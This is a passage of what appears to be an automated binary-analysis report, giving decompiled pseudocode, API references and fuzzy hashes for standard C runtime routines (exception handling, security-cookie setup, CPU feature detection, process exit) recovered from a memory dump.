				_push(__edi);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00A318F0(_t41);
					_pop(_t63);
				}
				E00A31E90(_t68,  &_v804, 0, 0x50);
				E00A31E90(_t68,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t63;
				_v556 = _t67;
				_v560 = _t62;
				_v564 = _t72;
				_v568 = _t68;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t69 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				_t58 = _t57;
				if(_t57 == 0 && _t69 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00A318F0(_t58);
				}
				return E00A31B61(_v8 ^ _t74);
			}

0x00a3511e
0x00a3511e
0x00a3511e
0x00a3511e
0x00a3511e
0x00a3511f
0x00a35121
0x00a35129
0x00a3512e
0x00a35130
0x00a35137
0x00a35138
0x00a3513a
0x00a3513d
0x00a35142
0x00a35142
0x00a3514e
0x00a35161
0x00a3516f
0x00a35175
0x00a3517b
0x00a35181
0x00a35187
0x00a3518d
0x00a35193
0x00a35199
0x00a3519f
0x00a351a5
0x00a351ac
0x00a351b3
0x00a351ba
0x00a351c1
0x00a351c8
0x00a351cf
0x00a351d0
0x00a351d9
0x00a351df
0x00a351e2
0x00a351e8
0x00a351f5
0x00a351fe
0x00a35207
0x00a35210
0x00a3521e
0x00a35220
0x00a3522d
0x00a35233
0x00a35235
0x00a35241
0x00a35244
0x00a35249
0x00a35258

APIs

IsDebuggerPresent.KERNEL32 ref: 00A35216
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A35220
UnhandledExceptionFilter.KERNEL32(?), ref: 00A3522D

Strings

`Vxt, xrefs: 00A35216

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: `Vxt
API String ID: 3906539128-3269278918
Opcode ID: 7d71a8a3b1aa2396322dc4b13769b5e3d0a023a53049f8f76c3722f688253a95
Instruction ID: bef37204289ccc53860af5ef8073966625e0ace425604bf402b15e404a6c196d
Opcode Fuzzy Hash: 7d71a8a3b1aa2396322dc4b13769b5e3d0a023a53049f8f76c3722f688253a95
Instruction Fuzzy Hash: 0831D2B5D412289BCB21DF68D9897DCBBB8BF08310F5041EAF80CA6251EB759B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00A31643, Relevance: 6.1, APIs: 4, Instructions: 56
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00A31643() {
				signed int _t21;
				signed int _t29;
				signed int _t30;
				signed int _t35;
				void* _t43;

				_pop(_t43);
				 *(_t43 - 0xc) =  *(_t43 - 0xc) & 0x00000000;
				 *(_t43 - 8) =  *(_t43 - 8) & 0x00000000;
				_t21 =  *0xa4dc28; // 0x4f268f78
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime(_t43 - 0xc);
					 *(_t43 - 4) =  *(_t43 - 8) ^  *(_t43 - 0xc);
					 *(_t43 - 4) =  *(_t43 - 4) ^ GetCurrentThreadId();
					 *(_t43 - 4) =  *(_t43 - 4) ^ GetCurrentProcessId();
					QueryPerformanceCounter(_t43 - 0x14);
					_t29 = _t43 - 4;
					_t35 =  *(_t43 - 0x10) ^  *(_t43 - 0x14) ^  *(_t43 - 4) ^ _t29;
					if(_t35 != 0xbb40e64e) {
						if((0xffff0000 & _t35) == 0) {
							_t30 = _t35;
							_t29 = (_t30 | 0x00004711) << 0x10;
							_t35 = _t35 | _t29;
						}
					} else {
						_t35 = 0xbb40e64f;
					}
					 *0xa4dc28 = _t35;
					 *0xa4dc24 =  !_t35;
				} else {
					_t29 =  !_t21;
					 *0xa4dc24 = _t29;
				}
				_push(_t43);
				return _t29;
			}

0x00a31645
0x00a31649
0x00a3164d
0x00a31651
0x00a31664
0x00a31677
0x00a31683
0x00a3168c
0x00a31695
0x00a3169c
0x00a316a5
0x00a316ae
0x00a316b2
0x00a316bd
0x00a316c0
0x00a316c6
0x00a316c9
0x00a316c9
0x00a316b4
0x00a316b4
0x00a316b4
0x00a316cb
0x00a316d3
0x00a3166a
0x00a3166a
0x00a3166c
0x00a3166c
0x00a316db
0x00a316de

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A31677
GetCurrentThreadId.KERNEL32 ref: 00A31686
GetCurrentProcessId.KERNEL32 ref: 00A3168F
QueryPerformanceCounter.KERNEL32(?), ref: 00A3169C

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0b1b48bbfc3b931e09dc940f46e9e273397ac342b8b0799775bb1fe2f37c0f49
Instruction ID: f3ae94d09a5258d253e9cf7c054a932cc8d5dd830b7c872ec9401475f1476255
Opcode Fuzzy Hash: 0b1b48bbfc3b931e09dc940f46e9e273397ac342b8b0799775bb1fe2f37c0f49
Instruction Fuzzy Hash: 9411E079D01108EBCB04CBF4EA856AEBBF4EF89351F64086BE403E3250DB329A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A34450, Relevance: 4.5, APIs: 3, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A34450() {
				void* _t14;
				void* _t16;
				void* _t17;

				_pop(_t17);
				if(E00A35795(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(),  *(_t17 + 8));
				}
				_push( *(_t17 + 8));
				E00A344D5(_t14, _t16);
				ExitProcess( *(_t17 + 8));
			}

0x00a34454
0x00a3445c
0x00a34478
0x00a34478
0x00a3447e
0x00a34481
0x00a3448a

APIs

GetCurrentProcess.KERNEL32(?,?,00A34426,?,00A46878,0000000C,00A3457D,?,00000002,00000000,?,00A34DC5,00000003,00A36A0D,?,?), ref: 00A34471
TerminateProcess.KERNEL32(00000000,?,00A34426,?,00A46878,0000000C,00A3457D,?,00000002,00000000,?,00A34DC5,00000003,00A36A0D,?,?), ref: 00A34478
ExitProcess.KERNEL32 ref: 00A3448A

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 420bcf9b3a911819b8e287dff169099d2ff00c5a382890eac094a6771900ea81
Instruction ID: 2cf2586c2eb867c9e57be19ab3e3ff7e87f3fb34accde27809d8584695406f0e
Opcode Fuzzy Hash: 420bcf9b3a911819b8e287dff169099d2ff00c5a382890eac094a6771900ea81
Instruction Fuzzy Hash: 6AE0B639401558AFCF11AFA4DE09B593F2AEFCA3D1F104424F8458A936CB36ED93CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E86F, Relevance: 1.8, APIs: 1, Instructions: 272
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00A3E86F() {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				long _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				intOrPtr* _t241;
				signed char _t244;
				long _t252;
				long _t258;
				long _t259;
				signed char _t261;
				void* _t263;
				void* _t264;
				long _t265;
				signed int* _t268;
				void* _t271;
				void* _t273;

				_t264 = _t263;
				_t271 = _t273;
				 *( *(_t271 + 8) + 4) = 0;
				_push(_t264);
				_t265 = 0xc000000d;
				 *( *(_t271 + 8) + 8) = 0;
				 *( *(_t271 + 8) + 0xc) = 0;
				_t244 =  *(_t271 + 0x10);
				if((_t244 & 0x00000010) != 0) {
					_t265 = 0xc000008f;
					 *( *(_t271 + 8) + 4) =  *( *(_t271 + 8) + 4) | 1;
				}
				if((_t244 & 0x00000002) != 0) {
					_t265 = 0xc0000093;
					 *( *(_t271 + 8) + 4) =  *( *(_t271 + 8) + 4) | 0x00000002;
				}
				if((_t244 & 0x00000001) != 0) {
					_t265 = 0xc0000091;
					 *( *(_t271 + 8) + 4) =  *( *(_t271 + 8) + 4) | 0x00000004;
				}
				if((_t244 & 0x00000004) != 0) {
					_t265 = 0xc000008e;
					 *( *(_t271 + 8) + 4) =  *( *(_t271 + 8) + 4) | 0x00000008;
				}
				if((_t244 & 0x00000008) != 0) {
					_t265 = 0xc0000090;
					 *( *(_t271 + 8) + 4) =  *( *(_t271 + 8) + 4) | 0x00000010;
				}
				_t268 =  *(_t271 + 0xc);
				 *( *(_t271 + 8) + 8) =  *( *(_t271 + 8) + 8) ^ ( !( *_t268 << 4) ^  *( *(_t271 + 8) + 8)) & 0x00000010;
				 *( *(_t271 + 8) + 8) =  *( *(_t271 + 8) + 8) ^ ( !( *_t268 +  *_t268) ^  *( *(_t271 + 8) + 8)) & 0x00000008;
				 *( *(_t271 + 8) + 8) =  *( *(_t271 + 8) + 8) ^ ( !( *_t268 >> 1) ^  *( *(_t271 + 8) + 8)) & 0x00000004;
				 *( *(_t271 + 8) + 8) =  *( *(_t271 + 8) + 8) ^ ( !( *_t268 >> 3) ^  *( *(_t271 + 8) + 8)) & 0x00000002;
				 *( *(_t271 + 8) + 8) =  *( *(_t271 + 8) + 8) ^ ( !( *_t268 >> 5) ^  *( *(_t271 + 8) + 8)) & 1;
				_push(E00A3CC2F( *(_t271 + 8)));
				_pop(_t261);
				if((_t261 & 0x00000001) != 0) {
					 *( *(_t271 + 8) + 0xc) =  *( *(_t271 + 8) + 0xc) | 0x00000010;
				}
				if((_t261 & 0x00000004) != 0) {
					 *( *(_t271 + 8) + 0xc) =  *( *(_t271 + 8) + 0xc) | 0x00000008;
				}
				if((_t261 & 0x00000008) != 0) {
					 *( *(_t271 + 8) + 0xc) =  *( *(_t271 + 8) + 0xc) | 0x00000004;
				}
				if((_t261 & 0x00000010) != 0) {
					 *( *(_t271 + 8) + 0xc) =  *( *(_t271 + 8) + 0xc) | 0x00000002;
				}
				if((_t261 & 0x00000020) != 0) {
					 *( *(_t271 + 8) + 0xc) =  *( *(_t271 + 8) + 0xc) | 1;
				}
				_t172 =  *_t268 & 0x00000c00;
				if(_t172 == 0) {
					 *( *(_t271 + 8)) =  *( *(_t271 + 8)) & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t259 =  *(_t271 + 8);
						_t225 =  *_t259 & 0xfffffffd | 1;
						L26:
						 *_t259 = _t225;
						L29:
						_t175 =  *_t268 & 0x00000300;
						if(_t175 == 0) {
							_t252 =  *(_t271 + 8);
							_t178 =  *_t252 & 0xffffffeb | 0x00000008;
							L35:
							 *_t252 = _t178;
							L36:
							_t179 =  *(_t271 + 8);
							_t256 = ( *(_t271 + 0x14) << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ ( *(_t271 + 0x14) << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *( *(_t271 + 8) + 0x20) =  *( *(_t271 + 8) + 0x20) | 1;
							if( *((intOrPtr*)(_t271 + 0x20)) == 0) {
								 *( *(_t271 + 8) + 0x20) =  *( *(_t271 + 8) + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)( *(_t271 + 8) + 0x10)) =  *((long long*)( *((intOrPtr*)(_t271 + 0x18))));
								 *( *(_t271 + 8) + 0x60) =  *( *(_t271 + 8) + 0x60) | 1;
								_t256 =  *(_t271 + 8);
								_t241 =  *((intOrPtr*)(_t271 + 0x1c));
								 *( *(_t271 + 8) + 0x60) =  *( *(_t271 + 8) + 0x60) & 0xffffffe3 | 0x00000002;
								 *((long long*)( *(_t271 + 8) + 0x50)) =  *_t241;
							} else {
								 *( *(_t271 + 8) + 0x20) =  *( *(_t271 + 8) + 0x20) & 0xffffffe1;
								 *((intOrPtr*)( *(_t271 + 8) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x18))));
								 *( *(_t271 + 8) + 0x60) =  *( *(_t271 + 8) + 0x60) | 1;
								_t241 =  *((intOrPtr*)(_t271 + 0x1c));
								 *( *(_t271 + 8) + 0x60) =  *( *(_t271 + 8) + 0x60) & 0xffffffe1;
								 *((intOrPtr*)( *(_t271 + 8) + 0x50)) =  *_t241;
							}
							E00A3CB95(_t256);
							RaiseException(_t265, 0, 1, _t271 + 8);
							_t258 =  *(_t271 + 8);
							if(( *(_t258 + 8) & 0x00000010) != 0) {
								 *_t268 =  *_t268 & 0xfffffffe;
							}
							if(( *(_t258 + 8) & 0x00000008) != 0) {
								 *_t268 =  *_t268 & 0xfffffffb;
							}
							if(( *(_t258 + 8) & 0x00000004) != 0) {
								 *_t268 =  *_t268 & 0xfffffff7;
							}
							if(( *(_t258 + 8) & 0x00000002) != 0) {
								 *_t268 =  *_t268 & 0xffffffef;
							}
							if(( *(_t258 + 8) & 0x00000001) != 0) {
								 *_t268 =  *_t268 & 0xffffffdf;
							}
							_t195 =  *_t258 & 0x00000003;
							if(_t195 == 0) {
								 *_t268 =  *_t268 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t268 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t268 = _t209;
									L58:
									_t199 =  *_t258 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t268 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t268 = _t202;
										L65:
										if( *((intOrPtr*)(_t271 + 0x20)) == 0) {
											 *_t241 =  *((long long*)(_t258 + 0x50));
										} else {
											 *_t241 =  *((intOrPtr*)(_t258 + 0x50));
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t268 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t268 =  *_t268 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t268 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t268 =  *_t268 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t252 =  *(_t271 + 8);
							_t178 =  *_t252 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *( *(_t271 + 8)) =  *( *(_t271 + 8)) & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t259 =  *(_t271 + 8);
						_t225 =  *_t259 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *( *(_t271 + 8)) =  *( *(_t271 + 8)) | 0x00000003;
					}
				}
			}

0x00a3e870
0x00a3e873
0x00a3e87d
0x00a3e883
0x00a3e884
0x00a3e889
0x00a3e88f
0x00a3e892
0x00a3e898
0x00a3e89d
0x00a3e8a2
0x00a3e8a2
0x00a3e8a8
0x00a3e8ad
0x00a3e8b2
0x00a3e8b2
0x00a3e8b9
0x00a3e8be
0x00a3e8c3
0x00a3e8c3
0x00a3e8ca
0x00a3e8cf
0x00a3e8d4
0x00a3e8d4
0x00a3e8db
0x00a3e8e0
0x00a3e8e5
0x00a3e8e5
0x00a3e8ed
0x00a3e8fd
0x00a3e90f
0x00a3e921
0x00a3e934
0x00a3e946
0x00a3e94e
0x00a3e94f
0x00a3e953
0x00a3e958
0x00a3e958
0x00a3e95f
0x00a3e964
0x00a3e964
0x00a3e96b
0x00a3e970
0x00a3e970
0x00a3e977
0x00a3e97c
0x00a3e97c
0x00a3e983
0x00a3e988
0x00a3e988
0x00a3e992
0x00a3e994
0x00a3e9ce
0x00a3e996
0x00a3e99b
0x00a3e9bf
0x00a3e9c7
0x00a3e9bb
0x00a3e9bb
0x00a3e9d1
0x00a3e9d8
0x00a3e9da
0x00a3e9fc
0x00a3ea04
0x00a3ea07
0x00a3ea07
0x00a3ea09
0x00a3ea09
0x00a3ea14
0x00a3ea1a
0x00a3ea1f
0x00a3ea26
0x00a3ea60
0x00a3ea6b
0x00a3ea71
0x00a3ea74
0x00a3ea77
0x00a3ea83
0x00a3ea8b
0x00a3ea28
0x00a3ea2b
0x00a3ea37
0x00a3ea3d
0x00a3ea43
0x00a3ea46
0x00a3ea4f
0x00a3ea4f
0x00a3ea8e
0x00a3ea9c
0x00a3eaa2
0x00a3eaa9
0x00a3eaab
0x00a3eaab
0x00a3eab2
0x00a3eab4
0x00a3eab4
0x00a3eabb
0x00a3eabd
0x00a3eabd
0x00a3eac4
0x00a3eac6
0x00a3eac6
0x00a3eacd
0x00a3eacf
0x00a3eacf
0x00a3eadc
0x00a3eadf
0x00a3eb16
0x00a3eae1
0x00a3eae1
0x00a3eae4
0x00a3eb0f
0x00a3eb04
0x00a3eb04
0x00a3eb18
0x00a3eb20
0x00a3eb23
0x00a3eb42
0x00a3eb47
0x00a3eb47
0x00a3eb49
0x00a3eb4e
0x00a3eb5a
0x00a3eb50
0x00a3eb53
0x00a3eb53
0x00a3eb5f
0x00a3eb5f
0x00a3eb25
0x00a3eb28
0x00a3eb37
0x00000000
0x00a3eb37
0x00a3eb2a
0x00a3eb2d
0x00a3eb2f
0x00a3eb2f
0x00000000
0x00a3eb2d
0x00a3eae6
0x00a3eae9
0x00a3eaff
0x00000000
0x00a3eaff
0x00a3eaee
0x00a3eaf0
0x00a3eaf0
0x00a3eaee
0x00000000
0x00a3eadf
0x00a3e9e1
0x00a3e9ef
0x00a3e9f7
0x00000000
0x00a3e9f7
0x00a3e9e5
0x00a3e9ea
0x00a3e9ea
0x00000000
0x00a3e9e5
0x00a3e9a2
0x00a3e9b0
0x00a3e9b8
0x00000000
0x00a3e9b8
0x00a3e9a6
0x00a3e9ab
0x00a3e9ab
0x00a3e9a6

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00A3E86A,00000000,00000000,00000008,?,?,00A3E50A,00000000), ref: 00A3EA9C

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1b4ebda6ce3b89b0db6bcab62ee6d3982e115c06166c7f112f0fd5dd7e111bc9
Instruction ID: 253ca11dc8ef4e9d84861134ec824ac89218966433ac3840c5979ef95f5f2ca1
Opcode Fuzzy Hash: 1b4ebda6ce3b89b0db6bcab62ee6d3982e115c06166c7f112f0fd5dd7e111bc9
Instruction Fuzzy Hash: 17B10831610609DFD715CF28C48ABA5BBA0FF45365F298699F89ACF2E1C335E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A319BB, Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00A319BB(signed int __edx) {
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				signed int _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;
				intOrPtr _t92;
				void* _t93;

				_t81 = __edx;
				_pop(_t93);
				 *0xa4e3ec =  *0xa4e3ec & 0x00000000;
				 *0xa4dc20 =  *0xa4dc20 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					_push(_t93);
					return 0;
				}
				 *(_t93 - 0x10) =  *(_t93 - 0x10) & 0x00000000;
				 *0xa4dc20 =  *0xa4dc20 | 0x00000002;
				 *0xa4e3ec = 1;
				_t83 = _t93 - 0x28;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *(_t83 + 0xc) = _t81;
				 *(_t93 - 8) =  *(_t93 - 0x28);
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *(_t83 + 0xc) = _t81;
				if(( *(_t93 - 0x1c) ^ 0x49656e69 |  *(_t93 - 0x20) ^ 0x6c65746e |  *(_t93 - 0x24) ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0xa4e3f0; // 0x2
					L10:
					 *(_t93 - 0x18) =  *(_t93 - 0x1c);
					_t53 =  *(_t93 - 0x20);
					 *(_t93 - 4) = _t53;
					 *(_t93 - 0x14) = _t53;
					if( *(_t93 - 8) >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t92 = _t68;
						_t70 = _t93 - 0x28;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t92;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *(_t70 + 0xc) = _t81;
						_t60 =  *(_t93 - 0x24);
						 *(_t93 - 0x10) = _t60;
						_t53 =  *(_t93 - 4);
						if((_t60 & 0x00000200) != 0) {
							 *0xa4e3f0 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0xa4dc20 =  *0xa4dc20 | 0x00000004;
						 *0xa4e3ec = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							 *(_t93 - 0xc) = _t53;
							 *(_t93 - 8) = _t81;
							if(( *(_t93 - 0xc) & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0xa4dc20; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0xa4e3ec = 3;
								 *0xa4dc20 = _t57;
								if(( *(_t93 - 0x10) & 0x00000020) != 0) {
									 *0xa4e3ec = 5;
									 *0xa4dc20 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 =  *(_t93 - 0x28) & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0xa4e3f0; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0xa4e3f0 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00a319bb
0x00a319bd
0x00a319be
0x00a319cc
0x00a319db
0x00a31b4e
0x00a31b51
0x00a31b54
0x00a31b54
0x00a319e1
0x00a319e7
0x00a319f2
0x00a319f8
0x00a319fb
0x00a319fc
0x00a31a00
0x00a31a01
0x00a31a03
0x00a31a06
0x00a31a09
0x00a31a12
0x00a31a31
0x00a31a34
0x00a31a35
0x00a31a36
0x00a31a3a
0x00a31a3b
0x00a31a3d
0x00a31a40
0x00a31a43
0x00a31a46
0x00a31a8b
0x00a31a8b
0x00a31a91
0x00a31a98
0x00a31a9b
0x00a31a9e
0x00a31aa1
0x00a31aa4
0x00a31aa8
0x00a31aab
0x00a31aac
0x00a31aaf
0x00a31ab1
0x00a31ab4
0x00a31ab6
0x00a31ab9
0x00a31abc
0x00a31abf
0x00a31ac7
0x00a31aca
0x00a31acd
0x00a31ad2
0x00a31ad2
0x00a31acd
0x00a31adf
0x00a31ae1
0x00a31ae8
0x00a31af7
0x00a31b02
0x00a31b05
0x00a31b08
0x00a31b19
0x00a31b1f
0x00a31b24
0x00a31b27
0x00a31b35
0x00a31b3a
0x00a31b3f
0x00a31b49
0x00a31b49
0x00a31b3a
0x00a31b19
0x00a31af7
0x00000000
0x00a31adf
0x00a31a4b
0x00a31a55
0x00a31a7a
0x00a31a80
0x00a31a83
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A319D4

Memory Dump Source

Source File: 00000000.00000002.361975103.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.361966712.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361988167.0000000000A41000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.361999131.0000000000A48000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.362009868.0000000000A4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b111a94301f43639250d25993cf400a6dee1401e4de13a957dad21691f1f5d38
Instruction ID: a656c1c5a45e0068ba1b477830699e812fae6d7b51710713fad9ba95a092ec7a
Opcode Fuzzy Hash: b111a94301f43639250d25993cf400a6dee1401e4de13a957dad21691f1f5d38
Instruction Fuzzy Hash: A641C0B5E012099FEB14CFA9D8867AEFBF4FB48311F14856AE405EB290D375A940CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3781C, Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00A3781C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t63;
				signed int _t66;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t80;
				CHAR* _t81;
				intOrPtr* _t85;
				intOrPtr _t87;
				void* _t89;
				intOrPtr* _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t104;
				signed int _t107;
				signed int _t108;
				union _FINDEX_INFO_LEVELS _t109;
				void* _t114;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;

				_t120 = _t122;
				_push(__ecx);
				_t85 =  *((intOrPtr*)(_t120 + 8));
				_t2 = _t85 + 1; // 0x1
				_t103 = _t2;
				do {
					_t35 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t107 =  *(_t120 + 0x10);
				_t87 = _t85 - _t103 + 1;
				 *((intOrPtr*)(_t120 - 4)) = _t87;
				if(_t87 <= (_t35 | 0xffffffff) - _t107) {
					_push(__ebx);
					_push(__esi);
					_t80 = _t107 + 1 + _t87;
					_push(E00A34DC6(_t87, _t107, _t80, 1));
					_pop(_t114);
					_pop(_t89);
					_t108 = _t107;
					__eflags = _t108;
					if(_t108 == 0) {
						L6:
						_push( *((intOrPtr*)(_t120 - 4)));
						_t80 = _t80 - _t108;
						_t40 = E00A3C97B(_t89, _t114 + _t108, _t80,  *((intOrPtr*)(_t120 + 8)));
						_t123 = _t122 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_push(_t114);
							_t73 = E00A37A5B( *((intOrPtr*)(_t120 + 0x14)), _t103, __eflags);
							_push(0);
							_t118 = _t73;
							E00A34CA1();
							_t75 = _t118;
							goto L8;
						}
					} else {
						_push(_t108);
						_t76 = E00A3C97B(_t89, _t114, _t80,  *((intOrPtr*)(_t120 + 0xc)));
						_t123 = _t122 + 0x10;
						__eflags = _t76;
						if(_t76 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A352F8();
							asm("int3");
							_push(_t120);
							_t121 = _t123;
							_t124 = _t123 - 0x150;
							_t43 =  *0xa4dc28; // 0x4f268f78
							 *(_t121 - 4) = _t43 ^ _t121;
							_t90 =  *((intOrPtr*)(_t121 + 0xc));
							_push(_t80);
							_t81 =  *(_t121 + 8);
							_push(_t114);
							_t115 =  *((intOrPtr*)(_t121 + 0x10));
							_push(_t108);
							 *((intOrPtr*)(_t121 - 0x148)) = _t115;
							while(1) {
								__eflags = _t90 - _t81;
								if(_t90 == _t81) {
									break;
								}
								_t45 =  *_t90;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
